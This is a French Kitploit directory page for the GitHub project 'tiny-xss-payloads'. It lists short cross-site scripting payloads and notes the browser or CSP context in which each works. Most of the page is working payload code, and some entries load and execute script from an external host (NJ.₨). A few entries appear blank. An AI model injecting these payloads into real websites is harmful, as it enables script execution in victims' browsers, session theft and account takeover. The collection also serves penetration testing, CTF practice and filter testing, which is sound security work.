Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Tiny-XSS-Payloads — Une collection de minuscules charges utiles XSS qui peuvent être utilisées dans différents contextes. https://tinyxss.terjanq.me | Kitploit
Outils/GitHubGitHub/terjanq/tiny-xss-payloads
Génération de PayloadsSécurité WebCTFRessources Organisées
GitHubterjanq/tiny-xss-payloads

Tiny-XSS-Payloads

Une collection de minuscules charges utiles XSS qui peuvent être utilisées dans différents contextes. https://tinyxss.terjanq.me

Voir le dépôt
2.4k2184il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Site web
Partager

Tiny-XSS-Payloads

Une collection de courtes charges utiles XSS pouvant être utilisées dans différents contextes.

La démo disponible ici : https://tinyxss.terjanq.me

Charges utiles actuelles

root@kitploit:~
<!-- Nécessite un script relatif inséré dans le DOM après le point d'insertion, 
  par ex. <base/href=//NJ.₨> ... <script src=/aaa></script> -->
<base/href=//NJ.₨>
root@kitploit:~
<!-- Fonctionne uniquement en XSS réfléchi -->
<svg/onload=eval(name)>
root@kitploit:~
<!-- Si vous contrôlez l'URL -->
<svg/onload=eval(`'`+URL)>
root@kitploit:~
<!-- Si vous contrôlez le nom, mais unsafe-eval n'est pas activé -->
<svg/onload=location=name>
root@kitploit:~
<!-- Dans Chrome, fonctionne aussi dans innerHTML, même sur des éléments pas encore insérés dans le DOM -->
<svg><svg/onload=eval(name)>
root@kitploit:~
<!-- Si vous contrôlez le nom de la fenêtre, cette charge utile fonctionnera dans innerHTML, même sur des éléments pas encore insérés dans le DOM -->
<audio/src/onerror=eval(name)>
root@kitploit:~
<!-- Si vous contrôlez l'URL, cette charge utile fonctionnera dans innerHTML, même sur des éléments pas encore insérés dans le DOM -->

root@kitploit:~
<!-- Juste un script ordinaire -->
<script/src=//NJ.₨></script>
root@kitploit:~
<!-- Si vous contrôlez le nom de la fenêtre -->

root@kitploit:~
<!-- Si vous contrôlez l'URL -->

root@kitploit:~
<!-- Si le nombre d'iframes sur la page est constant -->

root@kitploit:~
<!-- pour Firefox uniquement -->
<script/href=//NJ.₨ />">
root@kitploit:~
<!-- Si le nombre d'iframes sur la page est aléatoire -->

root@kitploit:~
<!-- Si unsafe-inline est désactivé dans la CSP et que les scripts externes sont autorisés -->
</script>">
root@kitploit:~
<!-- Si les styles en ligne sont autorisés -->
<style/onload=eval(name)>
root@kitploit:~
<!-- Si les styles en ligne sont autorisés et que l'URL peut être contrôlée -->
<style/onload=eval(`'`+URL)>
root@kitploit:~
<!-- Si les styles en ligne sont bloqués -->
<style/onerror=eval(name)>
root@kitploit:~
<!-- Utilise un script externe comme import, ne fonctionne pas dans innerHTML -->
<!-- La preuve de concept ne fonctionne que sur https et Chrome, car NJ.₨ vérifie l'en-tête Sec-Fetch-Dest -->
<svg/onload=import(/\\NJ.₨/)>
root@kitploit:~
<!-- Utilise un script externe comme import, déclenche si les styles en ligne sont autorisés -->
<!-- La preuve de concept ne fonctionne que sur https et Chrome, car NJ.₨ vérifie l'en-tête Sec-Fetch-Dest -->
<style/onload=import(/\\NJ.₨/)>
root@kitploit:~
<!-- Utilise un script externe comme import -->
<!-- La preuve de concept ne fonctionne que sur https et Chrome, car NJ.₨ vérifie l'en-tête Sec-Fetch-Dest -->

Obsolète :

root@kitploit:~
<!-- Si vous contrôlez l'URL, Safari uniquement -->

root@kitploit:~
<!-- Si les styles en ligne sont autorisés, Safari uniquement -->
<style/onload=write(URL)>
Télécharger l’outil